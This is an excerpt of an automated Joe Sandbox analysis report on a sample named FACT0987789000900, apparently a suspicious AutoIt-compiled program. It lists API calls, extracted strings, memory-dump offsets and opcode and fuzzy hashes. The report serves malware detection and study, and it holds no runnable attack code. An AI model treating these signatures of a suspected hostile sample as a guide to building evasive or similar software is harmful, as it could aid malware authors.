                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Internet$OpenOption
                                                                                                                • String ID: <local>
                                                                                                                • API String ID: 942729171-4266983199
                                                                                                                • Opcode ID: 227c7b512b87a3af29fee0e464f65f73fcd494d7ae72f3aee713b70a2277fd33
                                                                                                                • Instruction ID: 8a7b77b36fe3ef4600a1f9027c119fb7176ecad8a3550782dc87b09fee311100
                                                                                                                • Opcode Fuzzy Hash: 227c7b512b87a3af29fee0e464f65f73fcd494d7ae72f3aee713b70a2277fd33
                                                                                                                • Instruction Fuzzy Hash: FB11CE70500261BADB258F528C88EEBFBA8FB96356F10822BF10546640D2746941D6F4
                                                                                                                APIs
                                                                                                                • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 004C37A7
                                                                                                                • ___raise_securityfailure.LIBCMT ref: 004C388E
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FeaturePresentProcessor___raise_securityfailure
                                                                                                                • String ID: (U
                                                                                                                • API String ID: 3761405300-1739593084
                                                                                                                • Opcode ID: 4c8316decb1fc939a4d56f8ca57868742fec7ba6dbc84084d93598cccceceb32
                                                                                                                • Instruction ID: 6239bad13aaf55654de7dde19324a11589c7bc6d6cec5c0b99eed4640f30e429
                                                                                                                • Opcode Fuzzy Hash: 4c8316decb1fc939a4d56f8ca57868742fec7ba6dbc84084d93598cccceceb32
                                                                                                                • Instruction Fuzzy Hash: C7211DB5501304DBE740DF55F9A67813BF8BB68316F20A82AE9048B3E0D3F46948EF45
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: htonsinet_addr
                                                                                                                • String ID: 255.255.255.255
                                                                                                                • API String ID: 3832099526-2422070025
                                                                                                                • Opcode ID: 77e2ac5e9b2c559aad21a00647eda97bcf30d7f589d71a4071c5c5ba9d48e2c3
                                                                                                                • Instruction ID: 9ebea4b41d236d123c2dc52b7a6e2f49e6995766e7790a190dec723eaefe8ec8
                                                                                                                • Opcode Fuzzy Hash: 77e2ac5e9b2c559aad21a00647eda97bcf30d7f589d71a4071c5c5ba9d48e2c3
                                                                                                                • Instruction Fuzzy Hash: FB010079200304ABCB11EF69C896FAAB364FF04315F10842BF5169B3D1D739E816C76A
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 004CB7EF
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend
                                                                                                                • String ID: ComboBox$ListBox
                                                                                                                • API String ID: 3850602802-1403004172
                                                                                                                • Opcode ID: f2d672086367ca1c5e0da421081dd040d40160d1c590bef96b3ba155559d465b
                                                                                                                • Instruction ID: 252c14c1c6fee4d73db583e05bc5007b45c58bd62642606bc6d3d6da82274245
                                                                                                                • Opcode Fuzzy Hash: f2d672086367ca1c5e0da421081dd040d40160d1c590bef96b3ba155559d465b
                                                                                                                • Instruction Fuzzy Hash: DF01F575601114ABCB44EBA4DC52EFE3769BF45314B00062EF462532C1EB78580887E8
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(?,00000180,00000000,?), ref: 004CB6EB
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend
                                                                                                                • String ID: ComboBox$ListBox
                                                                                                                • API String ID: 3850602802-1403004172
                                                                                                                • Opcode ID: cc71ddb27c2e35b7778ddec41c512575e9b4c2fd70c2d4fd677d5fec30c1701a
                                                                                                                • Instruction ID: 3365fb0f21e832c87e44049a63f1bc025fb7158b6ee3d54964a76789249dd0a9
                                                                                                                • Opcode Fuzzy Hash: cc71ddb27c2e35b7778ddec41c512575e9b4c2fd70c2d4fd677d5fec30c1701a
                                                                                                                • Instruction Fuzzy Hash: 0E018F79A41004BBCB44EBA5C953FFF77A89F05348F10002EB402A3281EB985E1897FA
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(?,00000182,?,00000000), ref: 004CB76C
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend
                                                                                                                • String ID: ComboBox$ListBox
                                                                                                                • API String ID: 3850602802-1403004172
                                                                                                                • Opcode ID: b62cbb6aab5915efeadbb204c9c47f921c4acf2bb1caf88b9bac2c740603af7e
                                                                                                                • Instruction ID: 23f8982741804f8b0c368754043802be613c15d9c282b3306943af71d8efa686
                                                                                                                • Opcode Fuzzy Hash: b62cbb6aab5915efeadbb204c9c47f921c4acf2bb1caf88b9bac2c740603af7e
                                                                                                                • Instruction Fuzzy Hash: C4018479641104BACB41E7A5D953FFE77A89F05348F50002EB80273191DB585E1987F9
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __calloc_crt
                                                                                                                • String ID: "U
                                                                                                                • API String ID: 3494438863-1484945351
                                                                                                                • Opcode ID: 6ef39e898d6d584b901850202d9d23f6515f0929a28129ca959646b2548d8516
                                                                                                                • Instruction ID: f699ea7a3a0ac2c2a78c1f89387219c5fac24a69bc737e6b75fd4b36e7bafcf3
                                                                                                                • Opcode Fuzzy Hash: 6ef39e898d6d584b901850202d9d23f6515f0929a28129ca959646b2548d8516
                                                                                                                • Instruction Fuzzy Hash: F3F04C792483015AF7148F59BC506E667D8F761764F10052FF208CA286E738C8415BBD
                                                                                                                APIs
                                                                                                                • LoadImageW.USER32(00490000,00000063,00000001,00000010,00000010,00000000), ref: 00494048
                                                                                                                • EnumResourceNamesW.KERNEL32(00000000,0000000E,004D67E9,00000063,00000000,75A50280,?,?,00493EE1,?,?,000000FF), ref: 005041B3
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: EnumImageLoadNamesResource
                                                                                                                • String ID: >I
                                                                                                                • API String ID: 1578290342-2868147925
                                                                                                                • Opcode ID: d84a56a460842f1c3afe4f8cdcce81caf3a55bb291b82e5005120c2aa15b11ff
                                                                                                                • Instruction ID: 58e21ec4528eb33584c6fb2ea7be0890d9ea9f0e315c607e9b1fa79a4ce4d66b
                                                                                                                • Opcode Fuzzy Hash: d84a56a460842f1c3afe4f8cdcce81caf3a55bb291b82e5005120c2aa15b11ff
                                                                                                                • Instruction Fuzzy Hash: A8F0F63134071077D6204B25FC5AFC23E69E764BB2F100106F310971E0D2F49088EAA8
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ClassName_wcscmp
                                                                                                                • String ID: #32770
                                                                                                                • API String ID: 2292705959-463685578
                                                                                                                • Opcode ID: 8945fb38d023a386d1e751a3b93d100a9b96b64e682a548cc9133f4013747420
                                                                                                                • Instruction ID: 4d3e7aeab10eb798ac9e8d271a49aa08d48d6e261098fed3f9f612ba5e0313a0
                                                                                                                • Opcode Fuzzy Hash: 8945fb38d023a386d1e751a3b93d100a9b96b64e682a548cc9133f4013747420
                                                                                                                • Instruction Fuzzy Hash: FAE0927760432527DB20AAA59C49EC7FBACAB61764F01005BB905D3151E664A605C7E4
                                                                                                                APIs
                                                                                                                • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 004CA63F
                                                                                                                  • Part of subcall function 004B13F1: _doexit.LIBCMT ref: 004B13FB
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Message_doexit
                                                                                                                • String ID: AutoIt$Error allocating memory.
                                                                                                                • API String ID: 1993061046-4017498283
                                                                                                                • Opcode ID: 3465aec1d8da9cb21cdaabdb18e1fb8bdf7c16eb991022bd1f1dd9c1008f28a7
                                                                                                                • Instruction ID: 209f1fb973803867558c666b8aff2d5f498f7a75579566b7c2f25da40ec71faf
                                                                                                                • Opcode Fuzzy Hash: 3465aec1d8da9cb21cdaabdb18e1fb8bdf7c16eb991022bd1f1dd9c1008f28a7
                                                                                                                • Instruction Fuzzy Hash: FCD0C2313C032832D210269A2C17FC57A489B29B59F14002BBF08951C249EA958002ED
                                                                                                                APIs
                                                                                                                • GetSystemDirectoryW.KERNEL32(?), ref: 0050ACC0
                                                                                                                • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 0050AEBD
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: DirectoryFreeLibrarySystem
                                                                                                                • String ID: WIN_XPe
                                                                                                                • API String ID: 510247158-3257408948
                                                                                                                • Opcode ID: f6aae78bbb05c7cb83c7ba5dc20ab266ef9c0922048b5c1e95d4e56f2a528792
                                                                                                                • Instruction ID: 9a76e526abc032140659ae3eb210de1845ac7ad0245f2c5a3ddd5c14567e743a
                                                                                                                • Opcode Fuzzy Hash: f6aae78bbb05c7cb83c7ba5dc20ab266ef9c0922048b5c1e95d4e56f2a528792
                                                                                                                • Instruction Fuzzy Hash: 0EE06DB0C00649EFEB11DBA5D9449ECBBB8BB58301F118086F012B25A0CB745E88EF36
                                                                                                                APIs
                                                                                                                • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 004F86E2
                                                                                                                • PostMessageW.USER32(00000000), ref: 004F86E9
                                                                                                                  • Part of subcall function 004D7A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 004D7AD0
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FindMessagePostSleepWindow
                                                                                                                • String ID: Shell_TrayWnd
                                                                                                                • API String ID: 529655941-2988720461
                                                                                                                • Opcode ID: 4c8ebd8ecdc5fdb3bf6e6eb67cad17cf40b82b7f7eb6a0a0809e9ed45fbed3f0
                                                                                                                • Instruction ID: 8efbe3b2d1d07223e29de34277fd8df58c789bc9f9c107fb610a0cadab7c17d8
                                                                                                                • Opcode Fuzzy Hash: 4c8ebd8ecdc5fdb3bf6e6eb67cad17cf40b82b7f7eb6a0a0809e9ed45fbed3f0
                                                                                                                • Instruction Fuzzy Hash: F2D0C9313853286BE26467709C0BFC66A28AB14B25F51481AB645AA2D0C9A8A9448668
                                                                                                                APIs
                                                                                                                • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 004F86A2
                                                                                                                • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 004F86B5
                                                                                                                  • Part of subcall function 004D7A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 004D7AD0
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FindMessagePostSleepWindow
                                                                                                                • String ID: Shell_TrayWnd
                                                                                                                • API String ID: 529655941-2988720461
                                                                                                                • Opcode ID: 7aa6295190ffe71980d07ebbf7e8b80386215937ba3a5e50acc9bccb67b7939d
                                                                                                                • Instruction ID: 10c0748a7efb45f26e0c30ef964b6bf6695f59b5ebfbcb82381f59df27f8d69c
                                                                                                                • Opcode Fuzzy Hash: 7aa6295190ffe71980d07ebbf7e8b80386215937ba3a5e50acc9bccb67b7939d
                                                                                                                • Instruction Fuzzy Hash: 77D01231385328B7E37477709C1FFC67F28AB14B25F11481AB749AA2D0C9E8E944C764